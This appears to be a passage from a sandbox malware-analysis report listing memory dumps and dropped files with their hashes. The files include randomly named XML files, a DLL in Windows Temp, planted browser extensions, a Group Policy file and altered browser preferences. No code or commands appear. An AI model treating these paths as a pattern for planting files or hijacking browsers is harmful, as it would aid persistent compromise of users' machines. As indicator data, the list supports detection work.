memory/4728-76-0x00007FFBBC8A0000-0x00007FFBBD362000-memory.dmp

memory/4728-86-0x00000160EEF00000-0x00000160EEF22000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6083300bc21c231a3e28a06480b4e0c2
SHA1 5af05f83ca95aa75e2605ab14d78c5a39237da95
SHA256 d674b3f7367d5d1663cdc417d031bb5d0ef09cc82eb11e3afeba6613ff1ef912
SHA512 7bd78028589a8985428f70c0a468b6c22d57e4ba0eb2c6929bc7e76ee06690fd448f0f13a5a5f8c6a8c9d752765fac6167cc98c4079e0d12a3c5445f5bf87cf0

memory/4728-88-0x00000160EEF40000-0x00000160EEF50000-memory.dmp

memory/4728-91-0x00007FFBBC8A0000-0x00007FFBBD362000-memory.dmp

memory/3016-92-0x0000000000B30000-0x00000000011EE000-memory.dmp

memory/3016-97-0x0000000000B30000-0x00000000011EE000-memory.dmp

memory/5100-98-0x0000000000D30000-0x00000000013EE000-memory.dmp

memory/5100-99-0x0000000010000000-0x00000000105D3000-memory.dmp

memory/5100-110-0x0000000002C70000-0x0000000002CF5000-memory.dmp

memory/2008-112-0x0000000073220000-0x00000000739D1000-memory.dmp

memory/2008-113-0x0000000000CD0000-0x0000000000CE0000-memory.dmp

memory/2008-115-0x0000000000CD0000-0x0000000000CE0000-memory.dmp

memory/2008-129-0x00000000042C0000-0x0000000004617000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 45209db688518b9958ae0454ae5f4330
SHA1 73890462e4c3c27855e2a425b18c28d1c0c77a85
SHA256 9044b84cd815839bad36b70c7609e77fde883c8bd5dccb48cc96a4086be0adaa
SHA512 2e1b748c5c98e3f42805e9e0b8fe55c2d7da18ee8ca44fc075468fd93214106a26e0f9f7ad8339adeabb93ebdf4ba9e9754015fc964c6ec8456f6e7f0df3e513

memory/2008-147-0x00000000048B0000-0x00000000048FC000-memory.dmp

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

MD5 4d1165402f9f90e5df03fb0aa780956d
SHA1 7abbd70ce215fa46ae527d7f73053f7d67227211
SHA256 b0342b0b1d056fc581d0d07c9a077fdcfa079382e46e859d2178b50fb1a424ad
SHA512 a41303344f2148387eb72230e2af5f2475d8c91ec96a298e5b7600fcdd5d0d07bd2af2603c074183e0aa8dee85e0fb7f0ec36d8437924c7d3654f895d84baed1

memory/2008-160-0x0000000073220000-0x00000000739D1000-memory.dmp

memory/5100-170-0x0000000002F80000-0x0000000002FE4000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 2eed991e6e31d306e68ef64d773d3e16
SHA1 27b5035255d679a7015d1a2e5bfcc5f124160689
SHA256 3b839645035f3ad69591e7e9db4967a695877782e57703ee61d64eeb11be7fa1
SHA512 d124006d52504010a7dd99599e58b026c28febe793e77609b6151152a7d3765cc52f3fec504680f7d9b08e183d3190858580c7035f9d95990292241535d40404

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

MD5 bd6b60b18aee6aaeb83b35c68fb48d88
SHA1 9b977a5fbf606d1104894e025e51ac28b56137c3
SHA256 b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA512 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

C:\Program Files (x86)\orRvbnhdU\HJtjZab.xml

MD5 c11c890df632243cc3a57843dba04745
SHA1 34bccc1069fadee775775b1277e0018790f2c909
SHA256 58a6ed8432fff7101552c0a253d2d5aacf94d72be2833da4b52416c833ed6020
SHA512 550dbe74fe7b483572827aa2a559454592c339079f806d318d94839d71d1140e5a3b50c34d67c1a402d1944cafb0ffcb45c5a12ae6b48ef64b7dbed8ef5ae89f

C:\Program Files (x86)\YrliKKkuhgWU2\IDhYlhm.xml

MD5 76846a0729472885efc22a0aea0ad7db
SHA1 066300eb9a9bb37932e7d493469ae2061fc77109
SHA256 c1cb16d2af84d641ab3f6ac76d0acb56ae95d110484fc8461bc39c67bd1d00e5
SHA512 d2344057e23a2d110a0b200edc3b65b0c8a40cf504c8485b9d655bc196bcb4955ca51c05ff92dca52c7350dfb227c22fc980529f21ec9ef96ceedd25b6a214dc

C:\ProgramData\qgjSpVnHOWlNdqVB\aewiCMC.xml

MD5 8d731b2443ecebb1e879d4b74e8d4222
SHA1 2c7c7676f1826dc01bcdcc47c9109592dbbb598d
SHA256 5f4eb8b5fb0c41cd3b88efcab8951aaa30998c29b312d5a0e9a4f34168a06775
SHA512 3a771996d56c84782df5d71953b54b2ab8d85f17036494bcd13cb78c12feb7dd36d5fa1a5fdb6446da22a5bfba59e4b6a142058eaf7e3d0e580aa9007db3d188

C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\XWITLon.xml

MD5 7b41975ea22f0f966fee56eb408575a5
SHA1 52659584014f8b18d154457e22e4b193b2eae2e3
SHA256 8ad74a73a5f6fd1dcb1ccb179ce2d27795dfe9094dd13715c8d9bef3c816fcf5
SHA512 518f23ae60e884a62fbe421ce1d68d3017b01bc347d6a7a7894a561d0f263f9fd60e05dc32883ad70a9becabf63c639044ca7a902b471d306303c636c5da414f

C:\Program Files (x86)\ycfBUKIjHxeOC\PxTyDEW.xml

MD5 aa8df0dba23dc740417a5b1978080699
SHA1 779a1ff81b666df7f910340e1c752da47972ee76
SHA256 c39b43f0e94aebd895a68df0a30b01a1b4b27f3afc2c2e5b8898a4e9b77040f5
SHA512 abef3ac7adeada357e92bc2c52d25d8b1ae6d93bd1ae3b7e311e0b6fcf176288fe3ae01df8d93ee867d962ce1128ddaa45ea24a94fa262b0e60b192324271ab4

C:\Windows\Temp\lwSRcZKonRlOofsg\hKfdPiVg\EyGBVHY.dll

MD5 db0e0228f220bd8fa3b45a0043744456
SHA1 e287442ab5c21cab796c6893a34f0474820b6515
SHA256 9d17deafa6484b95a25345472c61bfbf7c510b4fafd2a52e7806db27ec4a6883
SHA512 a6d1aa8dc12f47ca1b9781264f02a4058287eb3bca0033ec9c3d3bd4adc9e3ac87c6bfcb361dc90ea40c056e0a9f29a28c7454afef5233a11c13c5c40d35f763

memory/5100-501-0x0000000003300000-0x0000000003383000-memory.dmp

memory/4352-503-0x0000000001530000-0x0000000001B03000-memory.dmp

memory/5100-517-0x0000000003CB0000-0x0000000003D7F000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\8ypl8oso.default-release\prefs.js

MD5 732ff4cecfb5a3558daf67b652aaaaef
SHA1 9a743435e6c612ed469449db47ba442e19451166
SHA256 79626ca22daf36a549e4a192e9b96be879ff0b51879a12f9c62bbe0bfeb8d2ab
SHA512 4bbe415e4242356d30c98b7856e74c73481db410243aa8bedb06d6c6b0f847131b801a51beccab962bc616fe5df3ecdb59b01dc8eaa30afc395e9ab9b8f3273f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 a8ac56ba8e1716c58f7b1cd7f1881dc3
SHA1 7d55d0d9855edb088bd40b2a9185d52df2a655a1
SHA256 fd0a7897b29bb511df34d115c561e48b5869e9112efa24df10c862191b79b76e
SHA512 0bd001b7170ebe012ddd25dc3bd65127a3d509574c7c394f447ad7f445e059199dfb84f20ce8f3301c25ff351a1b16e375001e3f833d3c1da28f0e43f3541ff0

memory/3416-574-0x0000000000AE0000-0x000000000119E000-memory.dmp

memory/5100-579-0x0000000000D30000-0x00000000013EE000-memory.dmp